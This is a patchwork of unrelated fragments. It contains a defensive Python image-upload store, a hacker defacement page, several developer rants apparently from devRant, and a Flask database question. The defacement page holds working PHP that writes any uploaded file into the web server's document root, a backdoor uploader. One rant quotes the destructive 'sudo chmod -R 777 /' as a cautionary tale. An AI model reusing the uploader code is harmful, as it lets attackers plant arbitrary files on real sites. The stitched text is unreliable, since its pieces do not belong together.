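    root; a dict stands in for the database table the diary mentions."""

    def __init__(self, private_dir):
        self.root = Path(private_dir).resolve()
        self.rows = {}

    def save(self, data, client_filename, uploader):
        if len(data) > MAX_BYTES:
            raise UploadRejected("file too large")
        ext, mime = sniff(data)
        # A real handler would now decode and re-encode the image, as the
        # diary does; a magic-byte match alone does not prove a valid image.
        image_id = uuid.uuid4().hex
        path = self.root / f"{image_id}.{ext}"
        # O_EXCL refuses to overwrite; 0o600 keeps the file private to the app user.
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        # The client's filename is kept only as inert metadata, never as a path.
        self.rows[image_id] = {"path": path, "mime": mime,
                               "uploader": uploader, "client_name": client_filename}
        return image_id

    def serve(self, image_id):
        """What the serving script does: an ID goes in, bytes and headers come out."""
        if not ID_RE.fullmatch(image_id) or image_id not in self.rows:
            raise UploadRejected("unknown image id")
        row = self.rows[image_id]
        headers = {"Content-Type": row["mime"], "X-Content-Type-Options": "nosniff"}
        return row["path"].read_bytes(), headers


def demo():
    """Run the checks on constructed inputs and report which ones held."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # constructed sample, PNG header only
    script = b"<?php echo 'hi'; ?>"             # constructed sample, not an image
    out = {}
    with tempfile.TemporaryDirectory() as tmp:
        store = ImageStore(tmp)
        image_id = store.save(png, "../../index.php", "alice")
        stored = store.rows[image_id]["path"]
        out["stored_name_is_uuid"] = stored.name == image_id + ".png"
        out["inside_private_dir"] = stored.parent == store.root
        body, headers = store.serve(image_id)
        out["served"] = body == png and headers["Content-Type"] == "image/png"
        checks = (("script_rejected", lambda: store.save(script, "cat.png", "bob")),
                  ("traversal_rejected", lambda: store.serve("../../etc/passwd")))
        for label, call in checks:
            try:
                call()
                out[label] = False
            except UploadRejected:
                out[label] = True
    return out


if __name__ == "__main__":
    print(demo())
```
-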
http://".$_SERVER['HTTP_HOST']."/server, check the code below
<html lang='en-US'><head><title>T3RR0R B@B@</title>
<a href="https://www.facebook.com/mr.T3RR0R" target="_blank"><h2>Click Here !</h2></a><br>
<style>
body{cursor:url("http:////"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
body {
background-color: #000000;
background-image: url(https://imgwm.com/images/...);
<!--http://twitrcover.com/ar/uploads/...-->
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-position:right top;
background-repeat:no-repeat;
background-size:110%
}
.style1 {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
</style><br><br><br>
<br>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}
?>
<!DOCTYPE html>
<html>
<title>K.I.T.A</title>
<audio autoplay loop>
<source src="http://micro.byethost24.com/KITA.mp..."></source>
</audio>
<head>
<link href='https://fonts.googleapis.com/css/...' rel='stylesheet' type='text/css'>
</head>
<body bgcolor="#2b2b2b" link="gray" text="gray">
<center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<br><br><br>
<div id="satu">
<embed src="https://youtube.com/v/tec_KllmOH4/...
<br>
<b style="font-size: 40px;">hacked by T3RR0R B@B@</b>
<br>
- use your brain to repair this system<br>
Scary Crazy Forbidden<br>
@2018<br><br>
Contact : fb.com/mr.T3RR0R
<br></div>
-
Spent literally two days trying to figure out why I have a 2 hour offset in my timezones for a LAMP web app. This isn't even close to my first timezone rodeo.
Check logs, reset Apache/MySQL/PHP timezones in like 100 places. Use 3rd party server side and client side timezone libraries. Moment.js you say? Shit works like a charm... but is, of course, still two hours off.
MySQL is right. PHP is right. Apache is right. PHP libs are in place. Finally convert the entire damn project to use epoch time because I have a deadline, I have no more time to read backwater AWS docs and try to figure out why the hell this Ubuntu EC2 is fucked up, and I literally cannot figure out why in the hell the damn clock is off.
Several days later notice a variable in the main .config file... right in root... 2 hour timezone offset.
Fuuuuuuuuuuuuuuuuuuuuck.
-
The ridiculous and shameful story of how simply "installing Windows" saved my hard drive from the garbage.
(Also update on https://devrant.com/rants/3105365/)
It started with my root partition turning read-only all of a sudden. Some quick search suggested that I should check the sanity of my hard drive, by running a SMART test, which failed of course. I backed up my data using ddrescue and ran a badblocks over the whole thing, which found around 800 unreadable blocks in a row. I was ready to bid farewell to my drive, but as a last resort, instead of the trash, I brought it to this place where they claimed they can repair the damaged hard drives by "surgery".
To my surprise, they returned my drive the next week, saying it is all well now, and charged me 1/8 the price of a new drive, with a refund guarantee if there was a problem in two days. There was a problem right there: I ran another SMART test which failed again, and also the faulty blocks were still unreadable! So I stormed the place and called for my refund, showing the failed SMART report. The only answer I would get from the staff was "Have you tried installing Windows?".
I usually try to be patient in such situations; I really don't like to declare publicly that "not everyone uses that stinky piece of rotten software you call an OS", but their suggestion seemed totally irrelevant! I got all types of IO errors all over the damn thing and they told me to install Windows. Why? Because this was the only test they would rely on. At last I managed to meet the "technician" there and showed him the IO errors: tried to read the bad sectors with dd and failed. He first mumbled something like "Have you checked the connector?" or "Are these the same blocks?", but after he ran out of bullshit, he said "Why don't you just install Windows first and see if that helps?" and I was ready to explode in his face!
"You test drives by installing Windows, just because it will make a nasty NTFS partition and probably does an fsck? If you shut your mouth for a sec and open your eyes you'll see this is a shit load of IO errors we got here: You can't install Windows, you can't even make an NTFS here, because it will try to zero-the-fuck-out the damn partition and it will face the same fucking IO error that I'm showing you right now in almost one single fucking system call!"
"I don't know this kind of test you are using. We have our own tests and they've passed successfully. So all I can do is to give you a Windows CD if you want."
"I don't need a Windows CD. I will just try to make an NTFS partition on the error spot and I will fail."
"Ok. Then call me when you're done."
I was angry, not only because I felt they're just trying to avoid a refund, but also because I knew I've lost my drive. But just with hope that I could get my money back, I made a small partition over the error spot and ran `mkfs.ntfs` on it. I was ready to show the failure to the guy, but I looked more precisely and saw that "the filesystem was created successfully!" I was sure something was not right. I then successfully mounted the new partition, wrote over it and read it again. I even dd'ed the blocks again, and this time there was no IO error. All of a sudden everything was fine.
I didn't know what happened. Maybe it just needed a write, while I'd just tried to read from those blocks. But anyway, I didn't call the technician guy again. I just thanked one of the staff there and said that my problem was solved. I then ran a successful SMART test and then restored my backup. Ridiculous like that.
I'm still not sure if my drive will continue to live with no more problems. I also have no explanation for what happened. (I appreciate any help on this https://superuser.com/questions/...) But I really like to see the look on the poor guy's face when he finds out that trying to install Windows just saved my ass!
-
Just remembered that I still had a foobar invite link in my email inbox 😋
The challenges are odd though, first challenge was super easy (basically an idiot check), but while I was able to convert 3 cans of energy drink into a functional solution in half an hour, the verification utility is not very verbose at all. So in Python 3.7.3 in my Debian box it worked just fine, yet the testing suite in Foobar was failing the whole time. After sending an email to my friend that gave the link (several years ago now, sorry about that! 😅) asking if he knew the problem, I found out that Google is still using Python 2.7.13 for some reason. Even Debian's Python is newer, at 2.7.16. To be fair it does still default to Python 2 too. But why.. why on Earth would you use Python 2.7 in a developer oriented set of challenges from a massive company, in 2020 when Python 2 has already been dead for almost a whole year?
But hey now that it's clear that it's Python 2.7, at least the next challenges should be a bit easier. Kind of my first time developing in SnekLang regardless actually, while the language doesn't have everything I'd expect (such as integer square root, at least not in Debian or the foobar challenge's interpreter), its math expressions are a lot cleaner than bash's (either expr or bc). So far I kinda like the language. 2-headed snake though and there's so much garbage for this language online, a lot more than there is for bash. I hate that. Half the stuff flat out doesn't work because it was written by someone who requires assistance to breathe.
Meh, here's to hoping that the next challenges will be smooth sailing :) after all most of the time spent on the first one (17.5 hours) was bottling up a solution for half an hour, tearing my hair out for a few hours on why Google's bloody verification tool wouldn't accept my functioning code (I wrote it for Python 3, assuming that that's what Google would be using), and 10 hours of sleep because no Google, I'm not scrubbing toilets for 48 hours. It's fair to warn people but no, I'm not gonna work for you as a cleaning lady! 😅
Other than the issues that the environment has, it's very fun to solve the challenges though. Fuck the theoretical questions with the whiteboard, all hiring processes should be like this!
-
So here I work with this colleague that, at first, had a reasonable résumé. Whatever.
Time went by and he is just doing tickets, clicking left and right, the usual grind of a shitty monitoring system which I am working intensely on deprecating that shit. Anyhoo
The last few days it became apparent that his resume was basically a hot air cake and he knows basically nothing intrinsically.
As I have stated before in previous rants, "everyone was a noob once"... But this guy...
He wants to do "something with Ansible"... "Ok what do you want to do?", I asked (and I regret to have asked).
He basically wants to write new files on targets. Easy enough, I show him how he could do it with playbooks, inventory and role just for demonstrating the entire chain.
This guy changes everything up, thereby breaking host group assignment, he launches it on ALL machines...
Luckily it's a harmless file, so dodged a bullet there.
But the real wtf is that he did it with the root account for our systems, without understanding the difference between "authentication" and "authorization"...
I am now explaining to him what the difference is and how he can be able to check it. I give him the commands literally! (sudo -l -U <user>)
Manages to fucking open up each sudoer file in vim, mistype or whatever he did in an attempt to leave vim... Breaks sudo...
Now he tries to spin it in such a way that I have steered him to break things.
"Dude you just fucking failed a copy/paste and you did absolutely fuckall without understanding what you are doing, then splurge out accusations because you did it wrong!"
FML
-
Hey passwd, when I want my password to be short then I want it fucking short. Don't tell me that "f" is too weak and prevent the action. A mere warning would suffice. (And I now know that if run as root it doesn't check the password criteria. Still, the default is annoying.)
I needed a short password to work around a weird frozen system issue on unlocking the keyring in the latest Ubuntu release. It would freeze completely while I was typing my password, and hence by making my password short, I was quicker than the freeze, and hence got a useable system again.
-
after exploring a lot of ui frameworks and architectures, i am trying to go back to android dev but again with the curiosity for the one single question that i had at the start of my career 5 years back : why is its ui so complex?
can anyone help me understand it?
like comparing with the most basic ui framework : html/css/js, why android is so different? we got activities, fragments and views. the worst thing in android is lifecycles, that each of these ui components have.
The view lifecycle is simple to get over with : whatever is the lifecycle of its parent, is the lifecycle of view.
a view's parent is another view, whose parent is another view, whose parent is... and so on until we reach the root view which is stored by either a fragment or activity
therefore a view's lifecycle = lifecycle of activity or fragment
till here its very clear. the fuckup is simply in the next part:
WTAF is activity ?WTAF is fragment? why are their various functions called in the sequence they are called? oncreate, on start, onstartview, ondestroy... why?
activity is still somewhat okay, but fragment is completely weird af : it can be a part of activity: basically it can cover your complete screen and behave as an activity itself (so you don't get to say that activity === screen and fragment === view) AND IT HAS ITS OWN FUCKING LIFECYCLES! So does that mean fragment's functions can also be called by OS?
what's more mind fucking, is the fact that android activity can destroy/pause or recreate fragments on its own, by some "views" like viewpager , or even hold multiple fragments as "alive" at the same time, using something called a "backstack" ??!??!
and each of these fragments in the stack can be called by system at any time? like wtf???
all this stuff is super confusing and i haven't even scratched the surface. the newer , more complicated stuff like viewmodel, livedata and again "lifecycles" has a complete separate behavior and functionality of their own. plus the various "reality-check" scenarios like: when a user is streaming a video in picture-in-picture mode while keeping your app in split screen with maps in the second split, when a call comes and the video keeps running, and user rotates the device, let me know the clusterfuck situation for the 3rd fragment in your 5 icon navigation view currently at the payment page with 2 fragments and 1 activity in backstack!!!
god bless thy soul for this shitty framework isn't going anywhere , rather its super strong and getting more clusterfucked with new beautiful shit everyday.
(if someone can ignore my gentle language, i would really like to know/get redirected to some resources where i can learn more on this)
-
Rant!!!
Recently, there has been this issue on StackOverflow not being friendly to beginners. I don't fully agree with that. SO is strict and rightly so because if not that, we will be flooded with repeated questions and low value answers. As a programmer, I believe when I go to SO, I want an answer quickly and fast because most at times, I'm programming and the problem I have is preventing me from moving forward. To be flooded by repeated and low quality questions and answers wouldn't help anyone. Also, on most beginner programming tutorials, where people are advised to check sites like SO when they have problems, most of them tell their listeners or readers to check if the question has been asked before, before going ahead to ask. Even SO assists you when typing your question with similar questions just to make sure you don't ask repeated questions. I rarely downvote but I understand those who do. Also, there is this talk about 'inclusivity' and some relating it to gender. It looks like people tend to slap gender and race on everything these days. To make this clear, I'm not a white male so that one wouldn't say the system favors me so I don't see the problem. The fact SO collects data about developers and it comes out that, most of the partakers are males doesn't mean SO is favoring males. SO doesn't show your gender when you ask a question. It doesn't even show your gender in your profile so what's the issue here? It will be better to get to the root of why there are few females in computer engineering and solve it there rather than blaming a site because of data collected. To know where this rant is coming from, just search StackOverflow on twitter and read the recent tweets.
-
!long rant
Trying to work from home is always a pain, since we need to use company laptops (no ifs, ands or buts about it).
Yesterday I took the laptop in to check for updates that just wouldn't run while at home (my first mistake), and I couldn't get past the "Press Ctrl+Alt+Delete to login" screen, laptop keyboard didn't seem to be registering clicks, and an external keyboard wasn't either (and I forgot about the on-screen keyboard). A couple of restarts later with no further changes to the situation, the laptop then didn't get past the BIOS screen.
So I called support (my second mistake) and logged an incident.
Couple of hours later someone comes to my desk and asks about the issue, so I describe it, show them (by now the laptop was once again getting past BIOS screen), and leave them to it. Since these laptops are just used as preconfigured VPN and RDP gateways, I said it would be okay if he just wanted to reinstall the OS (my third mistake).
Several hours later, after staying late last night waiting for it to finish, I loaded my profile, installed updates, shut down, grabbed my stuff and left, without checking VPN or RDP over WiFi (my fourth mistake).
Turns out that some of the buttons on the keyboard just no longer work, but now USB keyboards do work, and I can just use OSK to login while out. I figured this would be my only issue with things, and that it was acceptable.
This morning I attempt to use the laptop, and forgot about OSK and the faulty delete button, so spent a few minutes on that. Try to connect to WiFi and find it can't connect, because of course, it doesn't remember the WiFi password, so I root around for the code in some drawer, enter it, and it works. VPN tries to connect and... get told to insert my smart card, which is already inserted, because the driver is wrong!
So I'm sitting here writing a post, not quite believing that I'm considering cancelling my plans for the day to go into the office because of a bloody driver issue now...
-
Is exclusively being assigned bug tickets only for a whole sprint (they're not my bugs) while another dev does feature work a bad sign? I'm a Senior SDE but my domain Knowledge is far weaker than the other SDE 2, so he can get feature work done faster. Bug fixes are general project ones that are either suddenly very critical or lower priority and leads me to keep debugging some other aspect of the system (not much documentation sadly so have to check whole flow slowly to understand it, very financial based).
My manager also just yesterday said as a senior my expectation is to lead a project and we'll discuss the requirements of my role. This is my direct manager, the one who assigned me all the bugs is the project manager, who also acts a bit like an SDE sometimes. The problem is I want to deliver work my main manager suggests but I simply don't get the time due to suddenly high priority bugs occurring (last night 1 hour before I log off, other manager says to find root cause analysis of a high priority bug), this isn't an oncall rota or task either, just normal bugs all the time.
Is this a bad sign? Am I about to be PiPed?9 -
So, we're performing a rewrite of an application. It's on an application (actual mortgage application, not 'app') that has 4 different entry points. We have the most common entry point converted to our re-written application with plans to have the next couple done over the next several weeks. Yesterday, the old version broke. It was under the impression that it could grab any row that matched the borrower and then check against a hash of that data to see if it could proceed. It can't. You can't hash data set 1 and expect it to be the same as the hash for data set 2. Not a thing. When asked, the only answer we could give right away was "We'll fix it, give us a couple of minutes" and "Sorry, bad {{appName}} is bad. We don't know root cause yet. We'll let you know when we do." Was pulled aside by my manager and told my answer was unsatisfactory and I shouldn't give answers like that. I get it, "Bad {{appName}} is bad" isn't great, but it's not like we were going to give that and leave it! We needed some time!2
-
I think I finally, really, comprehend why secret societies have historically been created... I mean the potentially logical ones. This train of thought is logically terrifying.
I want a logic check.
I've been jokingly mentioning some of my totally true, practically useless in most scenarios, skills/specific fields of knowledge/ability under a moniker of 'extremely useful, assuming apocalyptic event' for years. Things like advanced knowledge of Coefficients of glass expansion, Fortran, various things that have caused friends to refer to me as MacGyver after the reboot came out.
In recent years, I've personally encountered several varieties of the ones defined by helplessness, self-victimisation, some version of a real disability... that they've expounded into a personified personal nemesis-- to flashily battle yet never overcome, etc... the vast majority perplexing me as to why that's a valid form of life to them... it's not that they never consider some other way; the ball is just quickly dropped and never picked back up.
College?(not that I'm a big fan) they wish they could but so expensive... aide? The form was hard/confusing/past-due...
Lookup/learn something more in-depth than a tiktok? *some self-deprecating bs*
Yet it's "I always wanted to do/be/learn X"
Shows like 'How It's Made' fascinate, but don't inspire enough for a 5min google query.
In the dev world it's a clear, inverted pyramid-- one of the first posts I saw when I rejoined here was ostream's rant on Apple sucking because after they stop support/updates you "can't" load a different OS... ofc you can. But several comments down... no mention of that... I think it was @LensFlare who was the only one in ~15 respondents to point out the core logical fallacy.
Basic shit is totally forgotten... try asking some random adults what plastic is made from... or pay attention to how many people declare they have a gluten "allergy".
I get people frequently telling me that things I'm pointing out as differences don't matter because "it's just semantics"... semantics is literally the epitome of "significance", with roots in 'meaning' and 'truth'
Back to the main issue... We are in a world where DIY is typically something you pay more to do as a catered experience than actually learning anything, people destroy their own arguments' hopes of validity unwittingly often by stating the argument, get 'offended' or 'triggered' by factual statements, propagate misinformation and bastardise words until MW needs money enough to print a new version, likely adding the misuse as an actual definition and basic knowledge and the thought to actually learn is vetoed by the existence of google translate, the wisdom of tiktok and the pure brilliance of troubleshooting every random linux issue you have from not knowing basic CLI and thinking linux makes you cool, with chmod 777 because so many other dumbasses on forums keep propagating misinformation. Ask them what 777 means, most have no clue... as they didn't consider googling that one before putting it in a terminal several times.
The number of humans that actually know the basic shit that the infrastructure of the world is built on keeps decreasing... and we aren't even keeping a running tally.
The structure of the internet has the right idea... dns- 13 active master root servers, with multiple redundancies if they start dropping... hell ICANN is like a secret society but publicly known/obfuscated... the modern internet hasn't had a global meltdown... aside from the lack of censorship and global availability changing the social definition of a valid use of braincells to essentially propagating spam as if it's factual and educational.
So many 'devs' so few understanding what a driver is, much less how to write one... irl network techs that don't know what dhcp is or that their equipment has logs... professionals in dedicated fields like Autism research/coping... no clue why it was called "autism", obesity and malnutrition simultaneously existing in the same humans... it's like we need to prepare a subterranean life-supporting vault and stock it like Noah's ark... just including the basic knowledge of things that used to be common/obvious. I've literally had 2 different, early 20s, female, certified medical assistants taking my medical history legitimately ask if not having a uterus made it harder to get pregnant... I wish I was joking.
Any ideas better than a subterranean human vault system? It's not like we can simply store detailed explanations, guides, media... unless we find a way to make them into obfuscated tiktok videos apparently on nonsense or makeup tutorials.11 -
This happened to me sometime back.
I want to try out a WordPress plugin in my local machine before installing on a production server. It is an Ubuntu machine. Downloaded and installed Xampp, then setup WordPress with MySQL. Now tried uploading the plugin zip file, it throws some permission error, asking to fix permissions or use FTP. I thought of just chmod 777 recursively for the WordPress directory to fix this easily.
Ran the command, looks like it is hung. Terminated using Ctrl+C and then ran the same command. Again it is taking much time. It should not take so much time to recursively change the permission of just a WordPress directory. Thought something was wrong. Before I realized the damage is already done.
Looks like I ran the command
sudo chmod -R 777 /
instead of
sudo chmod -R 777 ./
Fuck, I missed a dot in the command and it is changing permissions of everything in my machine. Saw the System monitor, CPU usage spiked to 100%. I can't close or open any program. Force shutdown the machine using the power key. It didn't boot again. Recovery mode didn't help. Looks like there is no easy way to restore back from this damage. Most of the files I need are backed up in the cloud, still, need a few more personal files so that I can format and reinstall Ubuntu. Realised I have Windows in dual booting. Boot into Windows and used some ext4 reader to recover the files, formatted and reinstalled the OS. Took a few hours to get back to my previous setup.
Lesson Learned: Don't use sudo unnecessarily.
Double check the command while executing.
Running a wrong command with root permission can fuckup your entire machine. -
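The slip described in the post above (`/` typed where `./` was meant) and the world-writable 777 mode can both be caught before chmod ever runs. This is an added example, not part of the original post: the function names `check_recursive_chmod` and `safe_chmod_r` are hypothetical, and `--preserve-root` assumes GNU chmod.

```shell
#!/bin/sh
# Added example: pre-flight guard for recursive chmod (hypothetical helper names).

# Resolve a directory to its canonical absolute path (follows symlinks, "..", "./").
canonical() {
    ( cd -- "$1" 2>/dev/null && pwd -P )
}

# Return 0 if a recursive chmod looks safe, 1 (with a reason on stderr) if not.
check_recursive_chmod() {
    mode=$1
    target=$2
    resolved=$(canonical "$target") || {
        echo "refused: '$target' is not an accessible directory" >&2
        return 1
    }
    # Refuse the filesystem root and top-level system directories,
    # however the path was spelled ("/", "/..", "/usr/..", ...).
    case "$resolved" in
        /|/bin|/boot|/dev|/etc|/home|/lib|/lib64|/opt|/proc|/root|/sbin|/sys|/usr|/var)
            echo "refused: '$target' resolves to system path '$resolved'" >&2
            return 1 ;;
    esac
    # Refuse world-writable octal modes: the last digit is the "other" class,
    # and 2, 3, 6, 7 all include the write bit (777 = rwx for user, group, other).
    # Symbolic modes such as o+w are not inspected by this check.
    case "$mode" in
        *[2367])
            echo "refused: mode $mode is world-writable" >&2
            return 1 ;;
    esac
    return 0
}

# Run the recursive chmod only after the checks pass.
safe_chmod_r() {
    check_recursive_chmod "$1" "$2" || return 1
    # --preserve-root is GNU chmod's own refusal to recurse into "/".
    chmod -R --preserve-root -- "$1" "$2"
}
```
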
I am not a programmer, but I know a little bit of Python, C# and C++, but mostly basic syntax of latest two. Nevertheless it gives me higher ground, why?
I develop way of thinking which makes my life easier. I have internship in Pharmacy and they print small papers with number which you show to get remaining drugs. Currently is number, 17592 which makes someone to type almost 40k numbers and erase also this amount. I use variable function in Libreoffice Writer and you have to type one number and it autonumber 64 (easily to expand but unnecessary) and save fucktone of time 😃 And this is why I think that teaching programming is beneficial, because it develops mindset of resolving problems in easier way.
On the other hand in a few hours I wrote program for my girlfriend to draw randomly picture of herbal material (leaf, root, fruit etc) and ask for Latin name of this material, check if is correct and display necessary information. Programming was quick, most of time I prepare data for this software and this feels so fucking awesome that I could use my knowledge to help my girlfriend and make something useful which makes me proud (code looks like blue waffle, but it works 😃). Fucking deadlines, but at least I could finish it 😃 -
That awkward feeling when you try to make an easy to pick up and use UI and fail so horrendously, that even a person otherwise skilled in computer management fails to grasp it...
I'm looking at you Synology and your fancy DSM bullshit that I just spent 2 hours trying to make available on WAN.
I almost gave up... Then realised I can log onto there through SSH, sudo su onto root and check out the webserver configuration (nginx) manually to make heads and tails of how to use it!
God... It's just Tuesday, and I already feel like I need a shot of something strong... -
I guess I'll just troubleshoot this controller for an hour or so before I check the file-tree and find out that I'm editing a stale file of the same name in the root instead of the nested file...
-
So for the past two days I had to deal with a problem where I have to do a nested query with sequelize, pretty straightforward reading the documentation, or that was what I thought. I implemented everything according to the docs but the query still fails, why? I had no idea, I double checked my implementation, I googled the error, no luck, after a day searching like crazy I talked with the backend lead about this and he helped me to realize that the naming convention was changing because sequelize is creating a nested (SELECT * FROM) because one of the relations has a one-to-many relation with the root model and I'm why the heck is doing that? But we both didn't know, and the problem was solved by just modifying the names, so we let it through, and sent it to QA. The next day I see the task rejected by QA and the reason was after the changes were merged another part of the app was broken, ok np, I'll fix it right away, and oh God I found the error was caused by another query that was including the first query we fixed yesterday! It was a nested query with 3 lvls! And the names became even more complex (like `model1->model2.colum1`), goddamit, ok, I spent most of the day searching again, nothing, read the specification of the findAll function, nope, tried to put that name in the ON clause as the docs suggested, still an error, shit, then the lead helps me again and creates a literal which can hold that name and voila! Everything is happiness, at least for that moment, but I was still curious about this behavior, so I keep digging on it and I've just found an issue where a great guy posted an option to the findAll method that is not documented in any version of sequelize! WTF! And this option was "subQuery" which if you set it to false it won't create that additional (SELECT * FROM) from before, FUUUCK!
I can't believe it, I know that all the effort works in my favor because I learn more about sequelize, but FFS I'm still angry because this shit shouldn't happen, you need to update the god damn docs, it's just adding a row and telling the people what it does. Well to end this, after putting that in the query and replacing all the workarounds with the expected syntax everything works like a charm.1
-
Checking for root is maintaining a false façade of security. By the definition of root it can always be bypassed and we should be designing workflows to discourage logging in from an untrusted device unless you have 2fa.1
-
I'm working on a simple Flask project. But when I try to work with the database I got an error called "No module named MySQLdb". I also got an error when I try to install "mysql client" with this command:- pip install mysqlclient. So I searched for the solution of this problem but every time I find someone telling to download "MySQL client" from this website:-
https://lfd.uci.edu/~gohlke/...
But the "MySQL client" file is no longer available on that website.
Please help me by giving that file or any other way. You can also check my project from here:-
https://drive.google.com/file/d/...
Unfortunately, my operating system is Android 6.0
Here is the code:-
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy

app = Flask(__name__)
# The mysql:// scheme makes SQLAlchemy import the MySQLdb module (provided by mysqlclient)
app.config['SQLALCHEMY_DATABASE_URI'] = "mysql://localhost/codingthunder/"
db = SQLAlchemy(app)

class Contacts(db.Model):
    sno = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(80), nullable=False)
    phone_num = db.Column(db.String(14), nullable=False)
    mes = db.Column(db.String(120), nullable=False)
    date = db.Column(db.String(12), nullable=False)
    email = db.Column(db.String(20), nullable=False)

@app.route("/home")
def home():
    return render_template("index.html")

@app.route("/about")
def about():
    return render_template("about.html")

@app.route("/contact", methods=['GET', 'POST'])
def contact():
    if request.method == 'POST':
        # Read the submitted form fields and store them as a new Contacts row
        name = request.form.get('name')
        email = request.form.get('email')
        phone = request.form.get('phone')
        message = request.form.get('message')
        entry = Contacts(name=name, phone_num=phone, mes=message, date="2019-09-01 12:06:20", email=email)
        db.session.add(entry)
        db.session.commit()
    return render_template("contact.html")

@app.route("/post")
def post():
    return render_template("post.html")

# debug=True turns on the Werkzeug debugger and reloader; for local development only
app.run(debug=True)
3 -
!rant
Apparently Android Pay released for Canadians some time ago, because it's on the front page of the google play store. I really want to use it cause remembering to carry a card around is tough work, but I'm failing the safetynet check.
My only choice, it seems is to revert to a system where I don't have root. I was thinking of installing lineageos, but I'd be giving up some pretty serious things that I've gotten into with Resurrection Remix.
The fling navbar would be gone, I'd probably be able to deal with that but I just find it a way nicer experience than the traditional android navbar.
I might not be able to use Google Assistant, not sure if Lineage has it
And (worst of all), if I revert to a system without root, I won't be able to use my system-wide dark mode from substratum (I'd also be losing battery optimizing features from greenify, which is just another downside)
Existing Android Pay users, is this worth it?10